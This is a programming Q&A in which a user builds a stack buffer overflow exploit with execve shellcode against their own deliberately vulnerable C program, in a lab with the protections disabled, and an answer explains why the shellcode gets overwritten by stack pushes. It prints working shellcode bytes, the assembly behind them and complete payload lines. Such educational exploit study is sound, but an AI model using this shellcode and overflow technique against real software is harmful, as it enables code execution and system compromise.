assembly x86-64 buffer-overflow exploit shellcode

How can I exploit Buffer Overflow on x86-64 Linux?

I made a simple vulnerable program greet.c:

#include <stdio.h>
#include <string.h>
int main (int argc, char **argv) {
    char buf[32];
    strcpy(buf, argv[1]);
    printf("%s\n");
    return 0;
}

I compiled the program with as many protections disabled as I know of (DEP/NX, Stack Canaries, RELRO, PIE) using GCC:

gcc -march=x86-64 -O2 -pipe -o greet greet.c -O0 -g -z execstack -fno-stack-protector -Wl,-z,norelro -no-pie -U_FORTIFY_SOURCE

I also temporary disabled ASLR (and verified with cat that it is disabled):

sudo sh -c 'echo 0 > /proc/sys/kernel/randomize_va_space'
sudo sh -c 'echo 0 > /proc/sys/kernel/yama/ptrace_scope'

Next I tried the exploitation via GDB, firstly I found the return address:

(gdb) disas main
   ...
   0x000000000040117e <+40>:    call   0x401050 <strcpy@plt>
   0x0000000000401183 <+45>:    lea    rax,[rbp-0x20]
   0x0000000000401187 <+49>:    mov    rdi,rax
   0x000000000040118a <+52>:    call   0x401060 <puts@plt>
   ...
(gdb) b *0x0000000000401187
(gdb) r $(python3 -c "print('A'*32)")
(gdb) x/20x $rsp
...
0x7fffffffdda0: 0xffffdef8      0x00007fff      0x00000000      0x00000002
0x7fffffffddb0: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffddc0: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffddd0: 0xffffde00      0x00007fff      0xf7c2a338      0x00007fff
...
(gdb) d 1

So return address should be 0x7fffffffddb0. Next I found offset how many bytes my exploit has to have:

(gdb) r $(python3 -c "import sys; sys.stdout.buffer.write(b'\x41'*40+b'\x42'*6)")
Program received signal SIGSEGV, Segmentation fault.
0x0000424242424242 in ?? ()

In x86-64 architecture, only the 6 bytes are pointing to memory, so this was a success and I am left with 46 bytes (40 bytes for exploit + 6 bytes to specify return address). Last step is to use a shellcode. I created my own:

; Platform: Linux (amd64/x64/x86-64)
; Syscalls:
;   1. execve("//bin/sh", NULL, NULL)
; Shellcode: 23 bytes
;   \x31\xd2\x52\x48\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x50\x31\xf6
;   \x54\x5f\x6a\x3b\x58\x0f\x05
global _start
section .text
_start:
    xor     edx,edx                    ; execve.envp = NULL
    push    rdx
    mov     rax,0x68732f6e69622f2f     ; "//bin/sh"
    push    rax
    xor     esi,esi                    ; execve.argv = NULL
    push    rsp
    pop     rdi                        ; execve.pathname = "//bin/sh"
    push    0x3b
    pop     rax                        ; execve
    syscall                            ; execve("//bin/sh", NULL, NULL)

Then I assembled it and tested it:

nasm -f elf64 -o linux-x64.o linux-x64.asm
ld -o linux-x64 linux-x64.o
./linux-x64

Aaaand I got the shell. Great! Next I made the shellcode:

objcopy -O binary -j .text linux-x64.o linux-x64.bin
hd -v -e '1/1 "%02x"' linux-x64.bin | sed -e 's/../&\\x/g' -e 's/^/\\x/' -e 's/\\x$/\n/'

There are also no null bytes, so all should be good. Lastly I used this shellcode padded with NOPs to fill all 40 bytes and added return address in little-endian format:

(gdb) r $(python3 -c "import sys; sys.stdout.buffer.write(b'\x90'*17+b'\x31\xd2\x52\x48\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x50\x31\xf6\x54\x5f\x6a\x3b\x58\x0f\x05'+b'\xb0\xdd\xff\xff\xff\x7f')")
Program received signal SIGILL, Illegal instruction.
0x00007fffffffddc1 in ?? ()

but I got SIGILL, so I tried one more time with different shellcode that I found on shell-storm (https://shell-storm.org/shellcode/files/shellcode-905.html):

(gdb) r $(python3 -c "import sys; sys.stdout.buffer.write(b'\x90'*11+b'\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05'+b'\xb0\xdd\xff\xff\xff\x7f')")
Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffddbf in ?? ()

But still no luck. Segfault this time.

What am I doing wrong?

GCC version just in case:

Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/x86_64-linux-gnu/14/lto-wrapper
OFFLOAD_TARGET_NAMES=nvptx-none:amdgcn-amdhsa
OFFLOAD_TARGET_DEFAULT=1
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 14.2.0-19ubuntu2' --with-bugurl=file:///usr/share/doc/gcc-14/README.Bugs --enable-languages=c,ada,c++,go,d,fortran,objc,obj-c++,m2,rust --prefix=/usr --with-gcc-major-version-only --program-suffix=-14 --program-prefix=x86_64-linux-gnu- --enable-shared --enable-linker-build-id --libexecdir=/usr/libexec --without-included-gettext --enable-threads=posix --libdir=/usr/lib --enable-nls --enable-bootstrap --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --with-default-libstdcxx-abi=new --enable-libstdcxx-backtrace --enable-gnu-unique-object --disable-vtable-verify --enable-plugin --enable-default-pie --with-system-zlib --enable-libphobos-checking=release --with-target-system-zlib=auto --enable-objc-gc=auto --enable-multiarch --disable-werror --enable-cet --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32,m64,mx32 --enable-multilib --with-tune=generic --enable-offload-targets=nvptx-none=/build/gcc-14-C86vgL/gcc-14-14.2.0/debian/tmp-nvptx/usr,amdgcn-amdhsa=/build/gcc-14-C86vgL/gcc-14-14.2.0/debian/tmp-gcn/usr --enable-offload-defaulted --without-cuda-driver --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu --with-build-config=bootstrap-lto-lean --enable-link-serialization=2
Thread model: posix
Supported LTO compression algorithms: zlib zstd
gcc version 14.2.0 (Ubuntu 14.2.0-19ubuntu2)

Solution

Let's look at the layout of the stack at the moment your shellcode gets control. One character = one byte.

nops.............shellcode..............retaddr.xxxxxxxx
^                                               ^                                     
rip                                             rsp

We've just executed ret, which popped the return address off the stack, incrementing rsp to point just past it. The next time you push something to the stack, you'll overwrite the return address. That's fine, you don't need it anymore. But the next push will overwrite the last 8 bytes of your code, and successive pushes will overwrite even more of it. That's why you get an illegal instruction fault: your code was overwritten by your stack data before being executed.

You could buy yourself a little bit of stack space by moving the shellcode to the beginning of the buffer data, with the 17 bytes of padding after it rather than before. I think for the code as it stands, that would be just enough space to avoid overwriting your code. If not, then another solution is simply to decrement the stack pointer so that it points well below your code, and is out of the way: do something like sub rsp, 0x78 before any other stack operations. (Immediates up to 0x7f can be encoded as a single byte, without including any zero bytes in the instruction; but maintaining at least 8-byte alignment is a good idea.)

I'd like to offer some unsolicited advice on your development process. When you found that your shellcode crashed with SIGILL, it seems that your immediate response was to change stuff: use a completely different third-party shellcode, change the buffer size, etc. IMHO, the better response is to keep everything exactly the same, and find out why it fails. What was the state of the program that caused SIGILL? How did it get to that state? Determine what information you need, and what tools can help you get it. Particularly for security research, this is the kind of instinct you want to cultivate.

What I did here was to simply single-step the exploit code in gdb. You can use display/i $pc to see each instruction disassembled before it's executed, and si to step one instruction at a time. I also used x/30i buf to disassemble the contents of the buffer. I was able to see that the program correctly jumped to the start of the buffer, and that its contents were correct at that point. By continuing to single-step the program and dumping the buffer periodically, I could see exactly when its contents became wrong: immediately after a push instruction. Then looking at the value of the stack pointer (p/x $rsp) and comparing with the address of the buffer, it was clear what was going on.

So this is the kind of process you want to get used to doing for yourself. It's not based on any kind of brilliant insight; just some basic familiarity with essential tools, careful attention to detail, and enough patience to stick with a problem until you truly understand its root cause.